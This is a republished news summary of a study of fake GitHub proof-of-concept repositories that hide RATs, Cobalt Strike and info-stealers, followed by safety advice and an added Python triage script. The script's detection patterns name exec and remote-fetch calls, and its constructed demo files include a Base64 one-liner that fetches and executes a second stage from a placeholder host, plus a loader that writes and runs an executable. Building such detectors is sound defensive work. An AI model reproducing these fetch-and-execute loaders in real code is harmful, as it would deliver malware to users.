Hidden Malware in Fake GitHub PoCs: Researchers Find 4,893 Malicious Repos
Researchers from the Leiden Institute of Advanced Computer Science analyzed over 47,000 GitHub repositories, uncovering that many fake proof‑of‑concept exploits conceal malware, with nearly 5,000 repositories deemed malicious and detailed case studies revealing hidden trojans, Cobalt Strike tools, and stealthy information stealers.
Data Collection and Analysis
Researchers at the Leiden Institute of Advanced Computer Science examined more than 47,300 GitHub repositories that contained proof‑of‑concept (PoC) code for vulnerabilities disclosed between 2017 and 2021. They applied three analysis mechanisms:
IP address analysis – comparing the IP addresses of PoC publishers with public blocklists and with VirusTotal and AbuseIPDB entries.
Binary analysis – submitting provided executables and their hashes to VirusTotal.
Hexadecimal and Base64 analysis – decoding obfuscated files before performing the binary and IP checks.
The study identified 150,734 unique IP addresses; 2,864 matched blocklist entries, 1,522 were flagged as malicious by VirusTotal, and 1,069 appeared in the AbuseIPDB database. Binary analysis of 6,160 executables uncovered 2,164 malicious samples hosted across 1,398 repositories.
Overall, 4,893 of the 47,313 examined repositories were classified as malicious, most of them linked to 2020 vulnerabilities. A subset of these repositories contained fake PoCs that were used to distribute malware. The researchers documented at least 60 live examples that GitHub is in the process of removing.
Malware in PoCs
Detailed case studies revealed a variety of malicious payloads hidden in PoCs:
A fake PoC for CVE‑2019‑0708 (BlueKeep) contained a Base64‑obfuscated Python script that fetched a VBScript from Pastebin. That VBScript was the Houdini RAT, a VBScript‑based trojan that lets an operator run commands through Windows CMD.
Another PoC acted as an information‑stealer, collecting system details, IP addresses, and user‑agent strings.
PowerShell PoCs included Base64‑encoded binaries flagged as malicious by VirusTotal.
Python PoCs often consisted of a single line that decoded a malicious Base64 payload.
The fabricated BlueKeep PoC bundled an executable identified as Cobalt Strike, with additional hidden scripts that, while inactive, could be weaponized.
How to Stay Safe
Blindly trusting unverified GitHub repositories is unsafe because their content is not vetted. Security testers should thoroughly examine any downloaded PoC before execution and follow these three steps:
Read the code carefully and understand what it will do on your network before running any of it.
If the code is heavily obfuscated or requires extensive manual analysis, test it in an isolated environment such as a sandboxed virtual machine and monitor network traffic for suspicious activity.
Use open‑source intelligence tools like VirusTotal to analyze binaries.
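The three steps above can be scripted as an offline first pass over a downloaded repository. The following is an added example, not code from the paper or from the article: it looks for Base64- and hex-obfuscated blobs (the patterns the study decoded), decodes them recursively and checks whether the result calls exec/eval, a subprocess or a remote fetch, and hashes any PE/ELF executable it finds, raw or embedded, so the hash can be looked up on VirusTotal by hand. The length thresholds, the indicator list and the four sample files it writes into a temporary directory are constructed assumptions; none of the samples is real malware and the payload URL is a placeholder.

```python
"""Offline triage of a downloaded PoC repository before anything is run.

Added example, not the study's own tooling. Thresholds, indicator list
and the demo files are assumptions; adjust them for your own repos.
"""
import base64
import binascii
import hashlib
import re
import tempfile
from pathlib import Path

# Runs this long are unlikely to be an honest constant in a small PoC
# (the lengths are assumptions, not values from the study).
B64_RE = re.compile(rb"[A-Za-z0-9+/]{80,}={0,2}")
HEX_RE = re.compile(rb"(?:\\x[0-9a-fA-F]{2}){40,}"
                    rb"|(?<![0-9a-fA-F])[0-9a-fA-F]{120,}(?![0-9a-fA-F])")
# Calls that turn a decoded blob into execution or a remote fetch.
EXEC_RE = re.compile(rb"\b(exec|eval|subprocess|os\.system|Invoke-Expression"
                     rb"|IEX|urlopen|requests\.get|pastebin\.com)\b", re.I)
MAGIC = {b"MZ": "PE", b"\x7fELF": "ELF"}


def decode_blobs(data: bytes, depth: int = 0, max_depth: int = 3) -> list:
    """Return every decodable Base64/hex blob in data, following nesting."""
    found = []
    if depth >= max_depth:
        return found
    for m in B64_RE.finditer(data):
        try:
            dec = base64.b64decode(m.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue
        found.append(dec)
        found.extend(decode_blobs(dec, depth + 1, max_depth))
    for m in HEX_RE.finditer(data):
        try:
            dec = bytes.fromhex(m.group(0).replace(b"\\x", b"").decode())
        except ValueError:
            continue
        found.append(dec)
        found.extend(decode_blobs(dec, depth + 1, max_depth))
    return found


def triage_file(path: Path) -> dict:
    """Describe what one file would do if run; findings is empty when clean."""
    data = path.read_bytes()
    report = {"findings": [], "sha256": None}

    def note_exe(blob, where):
        # Hash raw or decoded executables so they can be checked on VirusTotal.
        for magic, kind in MAGIC.items():
            if blob.startswith(magic):
                report["sha256"] = hashlib.sha256(blob).hexdigest()
                report["findings"].append(f"{where} {kind} executable: look up hash on VirusTotal")

    note_exe(data, "raw")
    obfuscated = B64_RE.search(data) or HEX_RE.search(data)
    if obfuscated and EXEC_RE.search(data):
        report["findings"].append("obfuscated blob next to an exec/fetch call")
    code = [l for l in data.splitlines() if l.strip() and not l.lstrip().startswith(b"#")]
    if len(code) == 1 and obfuscated and EXEC_RE.search(data):
        report["findings"].append("single-line decode-and-execute script")
    for blob in decode_blobs(data):
        hit = EXEC_RE.search(blob)
        if hit:
            report["findings"].append("decoded payload calls " + hit.group(1).decode(errors="replace"))
        note_exe(blob, "embedded")
    return report


def triage_repo(root: Path) -> dict:
    """Map each flagged file (path relative to root) to its report."""
    out = {}
    for p in sorted(root.rglob("*")):
        if p.is_file():
            r = triage_file(p)
            if r["findings"]:
                out[p.relative_to(root).as_posix()] = r
    return out


def build_demo_repo() -> Path:
    """Write four constructed files: a benign PoC, a Base64 one-liner that
    fetches and execs a second stage, a hex-encoded dropper and a bare PE stub."""
    root = Path(tempfile.mkdtemp(prefix="poc-triage-"))
    (root / "exploit.py").write_bytes(
        b"#!/usr/bin/env python3\n"
        b"# Constructed benign PoC: sends one crafted packet and prints the reply.\n"
        b"import socket, sys\n"
        b"s = socket.create_connection((sys.argv[1], 3389), timeout=5)\n"
        b"s.sendall(b'\\x03\\x00\\x00\\x13\\x0e\\xe0\\x00\\x00\\x00\\x00\\x00\\x01')\n"
        b"print(s.recv(1024))\n")
    stage2 = (b"import urllib.request\n"
              b"exec(urllib.request.urlopen('https://example.invalid/raw/stage2').read())\n")
    (root / "oneliner.py").write_bytes(
        b"import base64;exec(base64.b64decode('" + base64.b64encode(stage2) + b"'))\n")
    pe_stub = b"MZ" + b"\x90" * 62 + b"PE\x00\x00"   # placeholder, not a real binary
    (root / "dropper.exe").write_bytes(pe_stub)
    hex_blob = b"".join(b"\\x%02x" % c for c in pe_stub)
    (root / "loader.py").write_bytes(
        b"import subprocess\nopen('x.exe', 'wb').write(b'" + hex_blob + b"')\n"
        b"subprocess.call(['x.exe'])\n")
    return root


if __name__ == "__main__":
    for name, rep in triage_repo(build_demo_repo()).items():
        print(name, rep["sha256"], *rep["findings"], sep="\n  ")
```

Run it against a cloned repository by passing the clone's root to `triage_repo`. A clean file such as the benign sample produces no report; the one-liner is flagged both for its shape and for the exec call inside the decoded payload, and the hex-encoded dropper yields the same SHA-256 as the bare PE stub, which is the value to paste into VirusTotal. A clean result is not a verdict, only the first filter before the sandboxed run the second step calls for.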
The researchers have reported all identified malicious repositories to GitHub, but removal can take time, leaving many repositories publicly accessible for the meantime.
Source: https://www.bleepingcomputer.com/news/security/thousands-of-github-repositories-deliver-fake-poc-exploits-with-malware/
This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contact us and we will review it promptly.